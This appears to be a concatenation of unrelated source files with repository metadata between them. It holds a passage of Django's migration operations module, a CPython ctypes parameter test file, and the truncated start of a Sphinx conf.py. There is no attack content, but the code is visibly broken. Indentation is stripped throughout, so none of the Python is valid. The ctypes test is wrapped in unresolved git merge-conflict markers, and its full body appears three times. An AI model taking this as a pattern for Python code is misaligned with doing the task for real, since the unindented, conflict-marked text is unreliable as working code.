# Move the main table
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
# Alter the fields pointing to us
for related_object in old_model._meta.related_objects:
if related_object.related_model == old_model:
model = new_model
related_key = (app_label, self.new_name_lower)
else:
model = related_object.related_model
related_key = (
related_object.related_model._meta.app_label,
related_object.related_model._meta.model_name,
)
to_field = to_state.apps.get_model(
*related_key
)._meta.get_field(related_object.field.name)
schema_editor.alter_field(
model,
related_object.field,
to_field,
)
# Rename M2M fields whose name is based on this model's name.
fields = zip(old_model._meta.local_many_to_many, new_model._meta.local_many_to_many)
for (old_field, new_field) in fields:
# Skip self-referential fields as these are renamed above.
if new_field.model == new_field.related_model or not new_field.remote_field.through._meta.auto_created:
continue
# Rename the M2M table that's based on this model's name.
old_m2m_model = old_field.remote_field.through
new_m2m_model = new_field.remote_field.through
schema_editor.alter_db_table(
new_m2m_model,
old_m2m_model._meta.db_table,
new_m2m_model._meta.db_table,
)
# Rename the column in the M2M table that's based on this
# model's name.
schema_editor.alter_field(
new_m2m_model,
old_m2m_model._meta.get_field(old_model._meta.model_name),
new_m2m_model._meta.get_field(new_model._meta.model_name),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
self.new_name_lower, self.old_name_lower = self.old_name_lower, self.new_name_lower
self.new_name, self.old_name = self.old_name, self.new_name
self.database_forwards(app_label, schema_editor, from_state, to_state)
self.new_name_lower, self.old_name_lower = self.old_name_lower, self.new_name_lower
self.new_name, self.old_name = self.old_name, self.new_name
def references_model(self, name, app_label=None):
return (
name.lower() == self.old_name_lower or
name.lower() == self.new_name_lower
)
def describe(self):
return "Rename model %s to %s" % (self.old_name, self.new_name)
def reduce(self, operation, in_between, app_label=None):
if (isinstance(operation, RenameModel) and
self.new_name_lower == operation.old_name_lower):
return [
RenameModel(
self.old_name,
operation.new_name,
),
]
# Skip `ModelOperation.reduce` as we want to run `references_model`
# against self.new_name.
return (
super(ModelOperation, self).reduce(operation, in_between, app_label=app_label) or
not operation.references_model(self.new_name, app_label)
)
class AlterModelTable(ModelOperation):
"""
Renames a model's table
"""
def __init__(self, name, table):
self.table = table
super(AlterModelTable, self).__init__(name)
def deconstruct(self):
kwargs = {
'name': self.name,
'table': self.table,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
state.models[app_label, self.name_lower].options["db_table"] = self.table
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.name)
schema_editor.alter_db_table(
new_model,
old_model._meta.db_table,
new_model._meta.db_table,
)
# Rename M2M fields whose name is based on this model's db_table
for (old_field, new_field) in zip(old_model._meta.local_many_to_many, new_model._meta.local_many_to_many):
if new_field.remote_field.through._meta.auto_created:
schema_editor.alter_db_table(
new_field.remote_field.through,
old_field.remote_field.through._meta.db_table,
new_field.remote_field.through._meta.db_table,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def describe(self):
return "Rename table for %s to %s" % (
self.name,
self.table if self.table is not None else "(default)"
)
def reduce(self, operation, in_between, app_label=None):
if isinstance(operation, (AlterModelTable, DeleteModel)) and self.name_lower == operation.name_lower:
return [operation]
return super(AlterModelTable, self).reduce(operation, in_between, app_label=app_label)
class ModelOptionOperation(ModelOperation):
def reduce(self, operation, in_between, app_label=None):
if isinstance(operation, (self.__class__, DeleteModel)) and self.name_lower == operation.name_lower:
return [operation]
return super(ModelOptionOperation, self).reduce(operation, in_between, app_label=app_label)
class FieldRelatedOptionOperation(ModelOptionOperation):
def reduce(self, operation, in_between, app_label=None):
if (isinstance(operation, FieldOperation) and
self.name_lower == operation.model_name_lower and
not self.references_field(operation.model_name, operation.name)):
return [operation, self]
return super(FieldRelatedOptionOperation, self).reduce(operation, in_between, app_label=app_label)
class AlterUniqueTogether(FieldRelatedOptionOperation):
"""
Changes the value of unique_together to the target one.
Input value of unique_together must be a set of tuples.
"""
option_name = "unique_together"
def __init__(self, name, unique_together):
unique_together = normalize_together(unique_together)
self.unique_together = set(tuple(cons) for cons in unique_together)
super(AlterUniqueTogether, self).__init__(name)
def deconstruct(self):
kwargs = {
'name': self.name,
'unique_together': self.unique_together,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.options[self.option_name] = self.unique_together
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.name)
schema_editor.alter_unique_together(
new_model,
getattr(old_model._meta, self.option_name, set()),
getattr(new_model._meta, self.option_name, set()),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_field(self, model_name, name, app_label=None):
return (
self.references_model(model_name, app_label) and
(
not self.unique_together or
any((name in together) for together in self.unique_together)
)
)
def describe(self):
return "Alter %s for %s (%s constraint(s))" % (self.option_name, self.name, len(self.unique_together or ''))
class AlterIndexTogether(FieldRelatedOptionOperation):
"""
Changes the value of index_together to the target one.
Input value of index_together must be a set of tuples.
"""
option_name = "index_together"
def __init__(self, name, index_together):
index_together = normalize_together(index_together)
self.index_together = set(tuple(cons) for cons in index_together)
super(AlterIndexTogether, self).__init__(name)
def deconstruct(self):
kwargs = {
'name': self.name,
'index_together': self.index_together,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.options[self.option_name] = self.index_together
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
new_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, new_model):
old_model = from_state.apps.get_model(app_label, self.name)
schema_editor.alter_index_together(
new_model,
getattr(old_model._meta, self.option_name, set()),
getattr(new_model._meta, self.option_name, set()),
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
return self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_field(self, model_name, name, app_label=None):
return (
self.references_model(model_name, app_label) and
(
not self.index_together or
any((name in together) for together in self.index_together)
)
)
def describe(self):
return "Alter %s for %s (%s constraint(s))" % (self.option_name, self.name, len(self.index_together or ''))
class AlterOrderWithRespectTo(FieldRelatedOptionOperation):
"""
Represents a change with the order_with_respect_to option.
"""
def __init__(self, name, order_with_respect_to):
self.order_with_respect_to = order_with_respect_to
super(AlterOrderWithRespectTo, self).__init__(name)
def deconstruct(self):
kwargs = {
'name': self.name,
'order_with_respect_to': self.order_with_respect_to,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.options['order_with_respect_to'] = self.order_with_respect_to
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
to_model = to_state.apps.get_model(app_label, self.name)
if self.allow_migrate_model(schema_editor.connection.alias, to_model):
from_model = from_state.apps.get_model(app_label, self.name)
# Remove a field if we need to
if from_model._meta.order_with_respect_to and not to_model._meta.order_with_respect_to:
schema_editor.remove_field(from_model, from_model._meta.get_field("_order"))
# Add a field if we need to (altering the column is untouched as
# it's likely a rename)
elif to_model._meta.order_with_respect_to and not from_model._meta.order_with_respect_to:
field = to_model._meta.get_field("_order")
if not field.has_default():
field.default = 0
schema_editor.add_field(
from_model,
field,
)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
self.database_forwards(app_label, schema_editor, from_state, to_state)
def references_field(self, model_name, name, app_label=None):
return (
self.references_model(model_name, app_label) and
(
self.order_with_respect_to is None or
name == self.order_with_respect_to
)
)
def describe(self):
return "Set order_with_respect_to on %s to %s" % (self.name, self.order_with_respect_to)
class AlterModelOptions(ModelOptionOperation):
"""
Sets new model options that don't directly affect the database schema
(like verbose_name, permissions, ordering). Python code in migrations
may still need them.
"""
# Model options we want to compare and preserve in an AlterModelOptions op
ALTER_OPTION_KEYS = [
"base_manager_name",
"default_manager_name",
"get_latest_by",
"managed",
"ordering",
"permissions",
"default_permissions",
"select_on_save",
"verbose_name",
"verbose_name_plural",
]
def __init__(self, name, options):
self.options = options
super(AlterModelOptions, self).__init__(name)
def deconstruct(self):
kwargs = {
'name': self.name,
'options': self.options,
}
return (
self.__class__.__name__,
[],
kwargs
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.options = dict(model_state.options)
model_state.options.update(self.options)
for key in self.ALTER_OPTION_KEYS:
if key not in self.options and key in model_state.options:
del model_state.options[key]
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
pass
def database_backwards(self, app_label, schema_editor, from_state, to_state):
pass
def describe(self):
return "Change Meta options on %s" % (self.name, )
class AlterModelManagers(ModelOptionOperation):
"""
Alters the model's managers
"""
serialization_expand_args = ['managers']
def __init__(self, name, managers):
self.managers = managers
super(AlterModelManagers, self).__init__(name)
def deconstruct(self):
return (
self.__class__.__name__,
[self.name, self.managers],
{}
)
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.name_lower]
model_state.managers = list(self.managers)
state.reload_model(app_label, self.name_lower)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
pass
def database_backwards(self, app_label, schema_editor, from_state, to_state):
pass
def describe(self):
return "Change managers on %s" % (self.name, )
class IndexOperation(Operation):
option_name = 'indexes'
@cached_property
def model_name_lower(self):
return self.model_name.lower()
class AddIndex(IndexOperation):
"""
Add an index on a model.
"""
def __init__(self, model_name, index):
self.model_name = model_name
if not index.name:
raise ValueError(
"Indexes passed to AddIndex operations require a name "
"argument. %r doesn't have one." % index
)
self.index = index
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.model_name_lower]
model_state.options[self.option_name].append(self.index)
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.add_index(model, self.index)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
schema_editor.remove_index(model, self.index)
def deconstruct(self):
kwargs = {
'model_name': self.model_name,
'index': self.index,
}
return (
self.__class__.__name__,
[],
kwargs,
)
def describe(self):
return 'Create index %s on field(s) %s of model %s' % (
self.index.name,
', '.join(self.index.fields),
self.model_name,
)
class RemoveIndex(IndexOperation):
"""
Remove an index from a model.
"""
def __init__(self, model_name, name):
self.model_name = model_name
self.name = name
def state_forwards(self, app_label, state):
model_state = state.models[app_label, self.model_name_lower]
indexes = model_state.options[self.option_name]
model_state.options[self.option_name] = [idx for idx in indexes if idx.name != self.name]
def database_forwards(self, app_label, schema_editor, from_state, to_state):
model = from_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
from_model_state = from_state.models[app_label, self.model_name_lower]
index = from_model_state.get_index_by_name(self.name)
schema_editor.remove_index(model, index)
def database_backwards(self, app_label, schema_editor, from_state, to_state):
model = to_state.apps.get_model(app_label, self.model_name)
if self.allow_migrate_model(schema_editor.connection.alias, model):
to_model_state = to_state.models[app_label, self.model_name_lower]
index = to_model_state.get_index_by_name(self.name)
schema_editor.add_index(model, index)
def deconstruct(self):
kwargs = {
'model_name': self.model_name,
'name': self.name,
}
return (
self.__class__.__name__,
[],
kwargs,
)
def describe(self):
return 'Remove index %s from %s' % (self.name, self.model_name)
|
{
"content_hash": "5ded0cbb515fd72e2f852090fc7f92f3",
"timestamp": "",
"source": "github",
"line_count": 845,
"max_line_length": 119,
"avg_line_length": 38.51715976331361,
"alnum_prop": 0.5705287737733125,
"repo_name": "darkryder/django",
"id": "a0e81f5e836297f2256979d68177902d536f6d2c",
"size": "32547",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "django/db/migrations/operations/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "52098"
},
{
"name": "HTML",
"bytes": "174451"
},
{
"name": "JavaScript",
"bytes": "251434"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11327916"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
}
|
<<<<<<< HEAD
<<<<<<< HEAD
import unittest, sys
from ctypes.test import need_symbol
class SimpleTypesTestCase(unittest.TestCase):
def setUp(self):
import ctypes
try:
from _ctypes import set_conversion_mode
except ImportError:
pass
else:
self.prev_conv_mode = set_conversion_mode("ascii", "strict")
def tearDown(self):
try:
from _ctypes import set_conversion_mode
except ImportError:
pass
else:
set_conversion_mode(*self.prev_conv_mode)
def test_subclasses(self):
from ctypes import c_void_p, c_char_p
# ctypes 0.9.5 and before did overwrite from_param in SimpleType_new
class CVOIDP(c_void_p):
def from_param(cls, value):
return value * 2
from_param = classmethod(from_param)
class CCHARP(c_char_p):
def from_param(cls, value):
return value * 4
from_param = classmethod(from_param)
self.assertEqual(CVOIDP.from_param("abc"), "abcabc")
self.assertEqual(CCHARP.from_param("abc"), "abcabcabcabc")
@need_symbol('c_wchar_p')
def test_subclasses_c_wchar_p(self):
from ctypes import c_wchar_p
class CWCHARP(c_wchar_p):
def from_param(cls, value):
return value * 3
from_param = classmethod(from_param)
self.assertEqual(CWCHARP.from_param("abc"), "abcabcabc")
# XXX Replace by c_char_p tests
def test_cstrings(self):
from ctypes import c_char_p, byref
# c_char_p.from_param on a Python String packs the string
# into a cparam object
s = b"123"
self.assertIs(c_char_p.from_param(s)._obj, s)
# new in 0.9.1: convert (encode) unicode to ascii
self.assertEqual(c_char_p.from_param(b"123")._obj, b"123")
self.assertRaises(TypeError, c_char_p.from_param, "123\377")
self.assertRaises(TypeError, c_char_p.from_param, 42)
# calling c_char_p.from_param with a c_char_p instance
# returns the argument itself:
a = c_char_p(b"123")
self.assertIs(c_char_p.from_param(a), a)
@need_symbol('c_wchar_p')
def test_cw_strings(self):
from ctypes import byref, c_wchar_p
c_wchar_p.from_param("123")
self.assertRaises(TypeError, c_wchar_p.from_param, 42)
self.assertRaises(TypeError, c_wchar_p.from_param, b"123\377")
pa = c_wchar_p.from_param(c_wchar_p("123"))
self.assertEqual(type(pa), c_wchar_p)
def test_int_pointers(self):
from ctypes import c_short, c_uint, c_int, c_long, POINTER, pointer
LPINT = POINTER(c_int)
## p = pointer(c_int(42))
## x = LPINT.from_param(p)
x = LPINT.from_param(pointer(c_int(42)))
self.assertEqual(x.contents.value, 42)
self.assertEqual(LPINT(c_int(42)).contents.value, 42)
self.assertEqual(LPINT.from_param(None), None)
if c_int != c_long:
self.assertRaises(TypeError, LPINT.from_param, pointer(c_long(42)))
self.assertRaises(TypeError, LPINT.from_param, pointer(c_uint(42)))
self.assertRaises(TypeError, LPINT.from_param, pointer(c_short(42)))
def test_byref_pointer(self):
# The from_param class method of POINTER(typ) classes accepts what is
# returned by byref(obj), it type(obj) == typ
from ctypes import c_short, c_uint, c_int, c_long, pointer, POINTER, byref
LPINT = POINTER(c_int)
LPINT.from_param(byref(c_int(42)))
self.assertRaises(TypeError, LPINT.from_param, byref(c_short(22)))
if c_int != c_long:
self.assertRaises(TypeError, LPINT.from_param, byref(c_long(22)))
self.assertRaises(TypeError, LPINT.from_param, byref(c_uint(22)))
def test_byref_pointerpointer(self):
# See above
from ctypes import c_short, c_uint, c_int, c_long, pointer, POINTER, byref
LPLPINT = POINTER(POINTER(c_int))
LPLPINT.from_param(byref(pointer(c_int(42))))
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_short(22))))
if c_int != c_long:
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_long(22))))
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_uint(22))))
def test_array_pointers(self):
from ctypes import c_short, c_uint, c_int, c_long, POINTER
INTARRAY = c_int * 3
ia = INTARRAY()
self.assertEqual(len(ia), 3)
self.assertEqual([ia[i] for i in range(3)], [0, 0, 0])
# Pointers are only compatible with arrays containing items of
# the same type!
LPINT = POINTER(c_int)
LPINT.from_param((c_int*3)())
self.assertRaises(TypeError, LPINT.from_param, c_short*3)
self.assertRaises(TypeError, LPINT.from_param, c_long*3)
self.assertRaises(TypeError, LPINT.from_param, c_uint*3)
def test_noctypes_argtype(self):
import _ctypes_test
from ctypes import CDLL, c_void_p, ArgumentError
func = CDLL(_ctypes_test.__file__)._testfunc_p_p
func.restype = c_void_p
# TypeError: has no from_param method
self.assertRaises(TypeError, setattr, func, "argtypes", (object,))
class Adapter(object):
def from_param(cls, obj):
return None
func.argtypes = (Adapter(),)
self.assertEqual(func(None), None)
self.assertEqual(func(object()), None)
class Adapter(object):
def from_param(cls, obj):
return obj
func.argtypes = (Adapter(),)
# don't know how to convert parameter 1
self.assertRaises(ArgumentError, func, object())
self.assertEqual(func(c_void_p(42)), 42)
class Adapter(object):
def from_param(cls, obj):
raise ValueError(obj)
func.argtypes = (Adapter(),)
# ArgumentError: argument 1: ValueError: 99
self.assertRaises(ArgumentError, func, 99)
################################################################
if __name__ == '__main__':
unittest.main()
=======
import unittest, sys
from ctypes.test import need_symbol
class SimpleTypesTestCase(unittest.TestCase):
def setUp(self):
import ctypes
try:
from _ctypes import set_conversion_mode
except ImportError:
pass
else:
self.prev_conv_mode = set_conversion_mode("ascii", "strict")
def tearDown(self):
try:
from _ctypes import set_conversion_mode
except ImportError:
pass
else:
set_conversion_mode(*self.prev_conv_mode)
def test_subclasses(self):
from ctypes import c_void_p, c_char_p
# ctypes 0.9.5 and before did overwrite from_param in SimpleType_new
class CVOIDP(c_void_p):
def from_param(cls, value):
return value * 2
from_param = classmethod(from_param)
class CCHARP(c_char_p):
def from_param(cls, value):
return value * 4
from_param = classmethod(from_param)
self.assertEqual(CVOIDP.from_param("abc"), "abcabc")
self.assertEqual(CCHARP.from_param("abc"), "abcabcabcabc")
@need_symbol('c_wchar_p')
def test_subclasses_c_wchar_p(self):
from ctypes import c_wchar_p
class CWCHARP(c_wchar_p):
def from_param(cls, value):
return value * 3
from_param = classmethod(from_param)
self.assertEqual(CWCHARP.from_param("abc"), "abcabcabc")
# XXX Replace by c_char_p tests
def test_cstrings(self):
from ctypes import c_char_p, byref
# c_char_p.from_param on a Python String packs the string
# into a cparam object
s = b"123"
self.assertIs(c_char_p.from_param(s)._obj, s)
# new in 0.9.1: convert (encode) unicode to ascii
self.assertEqual(c_char_p.from_param(b"123")._obj, b"123")
self.assertRaises(TypeError, c_char_p.from_param, "123\377")
self.assertRaises(TypeError, c_char_p.from_param, 42)
# calling c_char_p.from_param with a c_char_p instance
# returns the argument itself:
a = c_char_p(b"123")
self.assertIs(c_char_p.from_param(a), a)
@need_symbol('c_wchar_p')
def test_cw_strings(self):
from ctypes import byref, c_wchar_p
c_wchar_p.from_param("123")
self.assertRaises(TypeError, c_wchar_p.from_param, 42)
self.assertRaises(TypeError, c_wchar_p.from_param, b"123\377")
pa = c_wchar_p.from_param(c_wchar_p("123"))
self.assertEqual(type(pa), c_wchar_p)
def test_int_pointers(self):
from ctypes import c_short, c_uint, c_int, c_long, POINTER, pointer
LPINT = POINTER(c_int)
## p = pointer(c_int(42))
## x = LPINT.from_param(p)
x = LPINT.from_param(pointer(c_int(42)))
self.assertEqual(x.contents.value, 42)
self.assertEqual(LPINT(c_int(42)).contents.value, 42)
self.assertEqual(LPINT.from_param(None), None)
if c_int != c_long:
self.assertRaises(TypeError, LPINT.from_param, pointer(c_long(42)))
self.assertRaises(TypeError, LPINT.from_param, pointer(c_uint(42)))
self.assertRaises(TypeError, LPINT.from_param, pointer(c_short(42)))
def test_byref_pointer(self):
# The from_param class method of POINTER(typ) classes accepts what is
# returned by byref(obj), it type(obj) == typ
from ctypes import c_short, c_uint, c_int, c_long, pointer, POINTER, byref
LPINT = POINTER(c_int)
LPINT.from_param(byref(c_int(42)))
self.assertRaises(TypeError, LPINT.from_param, byref(c_short(22)))
if c_int != c_long:
self.assertRaises(TypeError, LPINT.from_param, byref(c_long(22)))
self.assertRaises(TypeError, LPINT.from_param, byref(c_uint(22)))
def test_byref_pointerpointer(self):
# See above
from ctypes import c_short, c_uint, c_int, c_long, pointer, POINTER, byref
LPLPINT = POINTER(POINTER(c_int))
LPLPINT.from_param(byref(pointer(c_int(42))))
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_short(22))))
if c_int != c_long:
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_long(22))))
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_uint(22))))
def test_array_pointers(self):
from ctypes import c_short, c_uint, c_int, c_long, POINTER
INTARRAY = c_int * 3
ia = INTARRAY()
self.assertEqual(len(ia), 3)
self.assertEqual([ia[i] for i in range(3)], [0, 0, 0])
# Pointers are only compatible with arrays containing items of
# the same type!
LPINT = POINTER(c_int)
LPINT.from_param((c_int*3)())
self.assertRaises(TypeError, LPINT.from_param, c_short*3)
self.assertRaises(TypeError, LPINT.from_param, c_long*3)
self.assertRaises(TypeError, LPINT.from_param, c_uint*3)
def test_noctypes_argtype(self):
import _ctypes_test
from ctypes import CDLL, c_void_p, ArgumentError
func = CDLL(_ctypes_test.__file__)._testfunc_p_p
func.restype = c_void_p
# TypeError: has no from_param method
self.assertRaises(TypeError, setattr, func, "argtypes", (object,))
class Adapter(object):
def from_param(cls, obj):
return None
func.argtypes = (Adapter(),)
self.assertEqual(func(None), None)
self.assertEqual(func(object()), None)
class Adapter(object):
def from_param(cls, obj):
return obj
func.argtypes = (Adapter(),)
# don't know how to convert parameter 1
self.assertRaises(ArgumentError, func, object())
self.assertEqual(func(c_void_p(42)), 42)
class Adapter(object):
def from_param(cls, obj):
raise ValueError(obj)
func.argtypes = (Adapter(),)
# ArgumentError: argument 1: ValueError: 99
self.assertRaises(ArgumentError, func, 99)
################################################################
if __name__ == '__main__':
unittest.main()
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
=======
import unittest, sys
from ctypes.test import need_symbol
class SimpleTypesTestCase(unittest.TestCase):
def setUp(self):
import ctypes
try:
from _ctypes import set_conversion_mode
except ImportError:
pass
else:
self.prev_conv_mode = set_conversion_mode("ascii", "strict")
def tearDown(self):
try:
from _ctypes import set_conversion_mode
except ImportError:
pass
else:
set_conversion_mode(*self.prev_conv_mode)
def test_subclasses(self):
from ctypes import c_void_p, c_char_p
# ctypes 0.9.5 and before did overwrite from_param in SimpleType_new
class CVOIDP(c_void_p):
def from_param(cls, value):
return value * 2
from_param = classmethod(from_param)
class CCHARP(c_char_p):
def from_param(cls, value):
return value * 4
from_param = classmethod(from_param)
self.assertEqual(CVOIDP.from_param("abc"), "abcabc")
self.assertEqual(CCHARP.from_param("abc"), "abcabcabcabc")
@need_symbol('c_wchar_p')
def test_subclasses_c_wchar_p(self):
from ctypes import c_wchar_p
class CWCHARP(c_wchar_p):
def from_param(cls, value):
return value * 3
from_param = classmethod(from_param)
self.assertEqual(CWCHARP.from_param("abc"), "abcabcabc")
# XXX Replace by c_char_p tests
def test_cstrings(self):
from ctypes import c_char_p, byref
# c_char_p.from_param on a Python String packs the string
# into a cparam object
s = b"123"
self.assertIs(c_char_p.from_param(s)._obj, s)
# new in 0.9.1: convert (encode) unicode to ascii
self.assertEqual(c_char_p.from_param(b"123")._obj, b"123")
self.assertRaises(TypeError, c_char_p.from_param, "123\377")
self.assertRaises(TypeError, c_char_p.from_param, 42)
# calling c_char_p.from_param with a c_char_p instance
# returns the argument itself:
a = c_char_p(b"123")
self.assertIs(c_char_p.from_param(a), a)
@need_symbol('c_wchar_p')
def test_cw_strings(self):
from ctypes import byref, c_wchar_p
c_wchar_p.from_param("123")
self.assertRaises(TypeError, c_wchar_p.from_param, 42)
self.assertRaises(TypeError, c_wchar_p.from_param, b"123\377")
pa = c_wchar_p.from_param(c_wchar_p("123"))
self.assertEqual(type(pa), c_wchar_p)
def test_int_pointers(self):
from ctypes import c_short, c_uint, c_int, c_long, POINTER, pointer
LPINT = POINTER(c_int)
## p = pointer(c_int(42))
## x = LPINT.from_param(p)
x = LPINT.from_param(pointer(c_int(42)))
self.assertEqual(x.contents.value, 42)
self.assertEqual(LPINT(c_int(42)).contents.value, 42)
self.assertEqual(LPINT.from_param(None), None)
if c_int != c_long:
self.assertRaises(TypeError, LPINT.from_param, pointer(c_long(42)))
self.assertRaises(TypeError, LPINT.from_param, pointer(c_uint(42)))
self.assertRaises(TypeError, LPINT.from_param, pointer(c_short(42)))
def test_byref_pointer(self):
# The from_param class method of POINTER(typ) classes accepts what is
# returned by byref(obj), it type(obj) == typ
from ctypes import c_short, c_uint, c_int, c_long, pointer, POINTER, byref
LPINT = POINTER(c_int)
LPINT.from_param(byref(c_int(42)))
self.assertRaises(TypeError, LPINT.from_param, byref(c_short(22)))
if c_int != c_long:
self.assertRaises(TypeError, LPINT.from_param, byref(c_long(22)))
self.assertRaises(TypeError, LPINT.from_param, byref(c_uint(22)))
def test_byref_pointerpointer(self):
# See above
from ctypes import c_short, c_uint, c_int, c_long, pointer, POINTER, byref
LPLPINT = POINTER(POINTER(c_int))
LPLPINT.from_param(byref(pointer(c_int(42))))
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_short(22))))
if c_int != c_long:
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_long(22))))
self.assertRaises(TypeError, LPLPINT.from_param, byref(pointer(c_uint(22))))
def test_array_pointers(self):
from ctypes import c_short, c_uint, c_int, c_long, POINTER
INTARRAY = c_int * 3
ia = INTARRAY()
self.assertEqual(len(ia), 3)
self.assertEqual([ia[i] for i in range(3)], [0, 0, 0])
# Pointers are only compatible with arrays containing items of
# the same type!
LPINT = POINTER(c_int)
LPINT.from_param((c_int*3)())
self.assertRaises(TypeError, LPINT.from_param, c_short*3)
self.assertRaises(TypeError, LPINT.from_param, c_long*3)
self.assertRaises(TypeError, LPINT.from_param, c_uint*3)
def test_noctypes_argtype(self):
import _ctypes_test
from ctypes import CDLL, c_void_p, ArgumentError
func = CDLL(_ctypes_test.__file__)._testfunc_p_p
func.restype = c_void_p
# TypeError: has no from_param method
self.assertRaises(TypeError, setattr, func, "argtypes", (object,))
class Adapter(object):
def from_param(cls, obj):
return None
func.argtypes = (Adapter(),)
self.assertEqual(func(None), None)
self.assertEqual(func(object()), None)
class Adapter(object):
def from_param(cls, obj):
return obj
func.argtypes = (Adapter(),)
# don't know how to convert parameter 1
self.assertRaises(ArgumentError, func, object())
self.assertEqual(func(c_void_p(42)), 42)
class Adapter(object):
def from_param(cls, obj):
raise ValueError(obj)
func.argtypes = (Adapter(),)
# ArgumentError: argument 1: ValueError: 99
self.assertRaises(ArgumentError, func, 99)
################################################################
if __name__ == '__main__':
unittest.main()
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
|
{
"content_hash": "6f49d1ecc890f094723b88be2bd6cbc6",
"timestamp": "",
"source": "github",
"line_count": 534,
"max_line_length": 88,
"avg_line_length": 35.07116104868914,
"alnum_prop": 0.5972340879965826,
"repo_name": "ArcherSys/ArcherSys",
"id": "58a97998afb1ddca42eb181461ff50e43e5c7a39",
"size": "18728",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Lib/ctypes/test/test_parameters.py",
"mode": "33188",
"license": "mit",
"language": [],
"symlink_target": ""
}
|
import sphinx_rtd_theme
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.intersphinx',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'arcade_tutorial'
copyright = '2017, Paul Everitt'
author = 'Paul Everitt'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store', 'env3*']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'arcade_tutorialdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
